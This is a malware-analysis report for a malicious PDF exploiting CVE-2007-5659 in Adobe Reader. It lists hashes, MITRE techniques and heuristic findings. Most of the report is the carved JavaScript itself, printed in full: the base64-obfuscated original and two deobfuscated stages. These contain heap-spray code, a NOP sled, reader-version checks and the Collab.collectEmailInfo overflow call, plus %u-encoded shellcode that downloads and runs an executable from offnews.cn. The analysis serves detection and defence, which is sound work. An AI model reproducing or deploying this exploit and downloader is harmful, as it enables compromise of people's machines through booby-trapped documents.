PDF malware analysis — malicious · 778589f742818c45

MALICIOUS

PDF

2.9 KB

MD5: 319516df4eec79827be07342bff80b69 SHA-1: 69449ee3231925b7efc385034e7af2f592ef063c SHA-256: 778589f742818c4527f5402e818dae7bf60de1a5d1beaef213945586b7f89202

258 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 in Adobe Reader. This script is designed to download and execute a second-stage payload from the URL http://offnews.cn/2/getexe.php?spl=pdf_exp. The use of JavaScript and exploit techniques indicates a malicious intent to compromise the user's system.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://offnews.cn/2/getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js` `c38e72d670ade46b3e2bfce1cda532c4043fc1bfa32d8504499400beed404df1`	pdf-javascript-stream	PDF /JS object 9 at offset 0xD6	20465 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode64(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyXXXStr.indexOf(input.charAt(i++)); enc2 = keyXXXStr.indexOf(input.charAt(i++)); enc3 = keyXXXStr.indexOf(input.charAt(i++)); enc4 = keyXXXStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) \| (enc2 >> 4); chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2); chr3 = ((enc3 & 3) << 6) \| enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while (i < input.length); return output; } var aasd = decode64("DQogdmFyIEl5YjBzUUg3ID0gbmV3IEFycmF5KCk7DQogdmFyIHFPTndZZEtjOw0KIHZhciBsYXZlID0gZXZhbDsNCiAgbGF2ZSh1bmVzY2FwZSgiJTIwJTIwJTIwJTY2JTc1JTZlJTYzJTc0JTY5JTZmJTZlJTIwJTQyJTYzJTRiJTc3JTc2JTc0JTc2JTY4JTI4JTQyJTU1JTU4JTc4JTQ5JTMzJTQ1JTY3JTJjJTIwJTYxJTcxJTcxJTc0JTQ3JTM4JTMxJTUyJTI5JTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTc3JTY4JTY5JTZjJTY1JTI4JTQyJTU1JTU4JTc4JTQ5JTMzJTQ1JTY3JTJlJTZjJTY1JTZlJTY3JTc0JTY4JTIwJTJhJTIwJTMyJTIwJTNjJTIwJTYxJTcxJTcxJTc0JTQ3JTM4JTMxJTUyJTI5JTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTQyJTU1JTU4JTc4JTQ5JTMzJTQ1JTY3JTIwJTJiJTNkJTIwJTQyJTU1JTU4JTc4JTQ5JTMzJTQ1JTY3JTNiJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTQyJTU1JTU4JTc4JTQ5JTMzJTQ1JTY3JTIwJTNkJTIwJTQyJTU1JTU4JTc4JTQ5JTMzJTQ1JTY3JTJlJTczJTc1JTYyJTczJTc0JTcyJTY5JTZlJTY3JTI4JTMwJTJjJTIwJTYxJTcxJTcxJTc0JTQ3JTM4JTMxJTUyJTIwJTJmJTIwJTMyJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTcyJTY1JTc0JTc1JTcyJTZlJTIwJTQyJTU1JTU4JTc4JTQ5JTMzJTQ1JTY3JTNiJTIwJTIwJTIwJTdkJTIwJTIwIikpOyAgbGF2ZSh1bmVzY2FwZSgiJTIwJTIwJTIwJTIwJTY2JTc1JTZlJTYzJTc0JTY5JTZmJTZlJTIwJTUxJTRlJTRlJTM1JTMxJTY4JTY3JTcwJTI4JTRiJTMyJTZjJTQ3JTc1JTY4JTc4JTc3JTI5JTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTRiJTMyJTZjJTQ3JTc1JTY4JTc4JTc3JTIwJTNkJTNkJTIwJTMwJTI5JTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTc5JTU1JTc0JTU1JTU4JTM4JTQyJTVhJTIwJTNkJTIwJTMwJTc4JTMwJTYzJTMwJTYzJTMwJTYzJTMwJTYzJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTczJTMyJTU0JTQ2JTMwJTU0JTY3JTY1JTIwJTNkJTIwJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM4JTQyJTM2JTM0JTI1JTc1JTMzJTMwJTM0JTMwJTI1JTc1JTMwJTQzJTM3JTM4JTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQyJTMwJTQzJTI1JTc1JTMxJTQzJTM3JTMwJTI1JTc1JTM4JTQyJTQxJTQ0JTI1JTc1JTMwJTM4JTM1JTM4JTI1JTc1JTMwJTM5JTQ1JTQyJTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQ0JTMzJTM0JTI1JTc1JTM3JTQzJTM0JTMwJTI1JTc1JTM1JTM4JTM4JTQyJTI1JTc1JTM2JTQxJTMzJTQzJTI1JTc1JTM1JTQxJTM0JTM0JTI1JTc1JTQ1JTMyJTQ0JTMxJTI1JTc1JTQ1JTMyJTMyJTQyJTI1JTc1JTQ1JTQzJTM4JTQyJTI1JTc1JTM0JTQ2JTQ1JTQyJTI1JTc1JTM1JTMyJTM1JTQxJTI1JTc1JTQ1JTQxJTM4JTMzJTI1JTc1JTM4JTM5JTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTM3JTM1JTM2JTI1JTc1JTM3JTMzJTM4JTQyJTI1JTc1JTM4JTQyJTMzJTQzJTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTMwJTMzJTM3JTM4JTI1JTc1JTM1JTM2JTQ2JTMzJTI1JTc1JTM3JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTMwJTI1JTc1JTMzJTMzJTQ2JTMzJTI1JTc1JTM0JTM5JTQzJTM5JTI1JTc1JTM0JTMxJTM1JTMwJTI1JTc1JTMzJTMzJTQxJTQ0JTI1JTc1JTMzJTM2JTQ2JTQ2JTI1JTc1JTQyJTQ1JTMwJTQ2JTI1JTc1JTMwJTMzJTMxJTM0JTI1JTc1JTQ2JTMyJTMzJTM4JTI1JTc1JTMwJTM4JTM3JTM0JTI1JTc1JTQzJTQ2JTQzJTMxJTI1JTc1JTMwJTMzJTMwJTQ0JTI1JTc1JTM0JTMwJTQ2JTQxJTI1JTc1JTQ1JTQ2JTQ1JTQyJTI1JTc1JTMzJTQyJTM1JTM4JTI1JTc1JTM3JTM1JTQ2JTM4JTI1JTc1JTM1JTQ1JTQ1JTM1JTI1JTc1JTM0JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTM0JTI1JTc1JTM2JTM2JTQzJTMzJTI1JTc1JTMwJTQzJTM4JTQyJTI1JTc1JTM4JTQyJTM0JTM4JTI1JTc1JTMxJTQzJTM1JTM2JTI1JTc1JTQ0JTMzJTMwJTMzJTI1JTc1JTMwJTM0JTM4JTQyJTI1JTc1JTMwJTMzJTM4JTQxJTI1JTc1JTM1JTQ2JTQzJTMzJTI1JTc1JTM1JTMwJTM1JTQ1JTI1JTc1JTM4JTQ0JTQzJTMzJTI1JTc1JTMwJTM4JTM3JTQ0JTI1JTc1JTM1JTMyJTM1JTM3JTI1JTc1JTMzJTMzJTQyJTM4JTI1JTc1JTM4JTQxJTQzJTQxJTI1JTc1JTQ1JTM4JTM1JTQyJTI1JTc1JTQ2JTQ2JTQxJTMyJTI1JTc1JTQ2JTQ2JTQ2JTQ2JTI1JTc1JTQzJTMwJTMzJTMyJTI1JTc1JTQ2JTM3JTM4JTQyJTI1JTc1JTQxJTQ1JTQ2JTMyJTI1JTc1JTQyJTM4JTM0JTQ2JTI ... (truncated)
`generic_stage_recovery_000.js` `87fa751d0fc2c8bfd0c9476c47f04db02ef4123da03dd23aa4ce8ba5845149e9`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6	5018 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var Iyb0sQH7 = new Array(); var qONwYdKc; var lave = eval; lave(unescape(" function BcKwvtvh(BUXxI3Eg, aqqtG81R) { while(BUXxI3Eg.length * 2 < aqqtG81R) { BUXxI3Eg += BUXxI3Eg; } BUXxI3Eg = BUXxI3Eg.substring(0, aqqtG81R / 2); return BUXxI3Eg; } ")); lave(unescape(" function QNN51hgp(K2lGuhxw) { if(K2lGuhxw == 0) { var yUtUX8BZ = 0x0c0c0c0c; var s2TF0Tge = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u6666%u656E%u7377%u632E%u2F6E%u2F32%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(K2lGuhxw == 1) { yUtUX8BZ = 0x30303030; var s2TF0Tge = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u6666%u656E%u7377%u632E%u2F6E%u2F32%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(K2lGuhxw == 2) { var s2TF0Tge = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u6666%u656E%u7377%u632E%u2F6E%u2F32%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var W4jrkPg5 = 0x400000; var pSKL0IHL = s2TF0Tge.length * 2; var aqqtG81R = W4jrkPg5 - (pSKL0IHL + 0x38); var BUXxI3Eg = unescape("%u9090%u9090"); BUXxI3Eg = BcKwvtvh(BUXxI3Eg, aqqtG81R); var CAqKI2uG = (yUtUX8BZ - 0x400000) / W4jrkPg5; for(var MNVCqBrg = 0; MNVCqBrg < CAqKI2uG; MNVCqBrg++) { Iyb0sQH7[MNVCqBrg] = BUXxI3Eg + s2TF0Tge; } } ")); lave(unescape(" function kaYz1E5Q() { var LPmqh4CU = 0; var F4pW6jm9 = app.viewerVersion.toString(); app.clearTimeOut(qONwYdKc); if((F4pW6jm9 >= 8 && F4pW6jm9 < 8.102) \|\| F4pW6jm9 < 7.1) { QNN51hgp(0); var oILxTCei = unescape("%u0c0c%u0c0c"); while(oILxTCei.length < 44952) oILxTCei += oILxTCei; var JChmRmD9 = this; var Mzys4BNH = Collab; JChmRmD9["collabStore"] = Mzys4BNH["collectEmailInfo"]( { subj : "", msg : oILxTCei } ); } if((F4pW6jm9 >= 8.102 && F4pW6jm9 < 8.104) \|\| (F4pW6jm9 >= 9 && F4pW6jm9 < 9.1) \|\| F4pW6jm9 <= 7.101) { try { if(app.doc.Collab.getIcon) ... (truncated)
`generic_stage_recovery_001.js` `05e1361012fe0e0500e3f23ebfdc6f2591f9d4f89b80f3debe00f98239b98138`	deobfuscated-js	generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6	5014 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var Iyb0sQH7 = new Array(); var qONwYdKc; var lave = eval; lave(unescape(" function BcKwvtvh(BUXxI3Eg, aqqtG81R) { while(BUXxI3Eg.length * 2 < aqqtG81R) { BUXxI3Eg += BUXxI3Eg; } BUXxI3Eg = BUXxI3Eg.substring(0, aqqtG81R / 2); return BUXxI3Eg; } ")); lave(unescape(" function QNN51hgp(K2lGuhxw) { if(K2lGuhxw == 0) { var yUtUX8BZ = 0x0c0c0c0c; var s2TF0Tge = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u6666%u656E%u7377%u632E%u2F6E%u2F32%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(K2lGuhxw == 1) { yUtUX8BZ = 0x30303030; var s2TF0Tge = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u6666%u656E%u7377%u632E%u2F6E%u2F32%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(K2lGuhxw == 2) { var s2TF0Tge = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u6666%u656E%u7377%u632E%u2F6E%u2F32%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var W4jrkPg5 = 0x400000; var pSKL0IHL = s2TF0Tge.length * 2; var aqqtG81R = W4jrkPg5 - (pSKL0IHL + 0x38); var BUXxI3Eg = unescape("%u9090%u9090"); BUXxI3Eg = BcKwvtvh(BUXxI3Eg, aqqtG81R); var CAqKI2uG = (yUtUX8BZ - 0x400000) / W4jrkPg5; for(var MNVCqBrg = 0; MNVCqBrg < CAqKI2uG; MNVCqBrg++) { Iyb0sQH7[MNVCqBrg] = BUXxI3Eg + s2TF0Tge; } } ")); lave(unescape(" function kaYz1E5Q() { var LPmqh4CU = 0; var F4pW6jm9 = app.viewerVersion.toString(); app.clearTimeOut(qONwYdKc); if((F4pW6jm9 >= 8 && F4pW6jm9 < 8.102) \|\| F4pW6jm9 < 7.1) { QNN51hgp(0); var oILxTCei = unescape("%u0c0c%u0c0c"); while(oILxTCei.length < 44952) oILxTCei += oILxTCei; var JChmRmD9 = this; var Mzys4BNH = Collab; JChmRmD9["collabStore"] = Mzys4BNH["collectEmailInfo"]( { subj : "", msg : oILxTCei } ); } if((F4pW6jm9 >= 8.102 && F4pW6jm9 < 8.104) \|\| (F4pW6jm9 >= 9 && F4pW6jm9 < 9.1) \|\| F4pW6jm9 <= 7.101) { try { if(app.doc.Collab.getIcon) ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.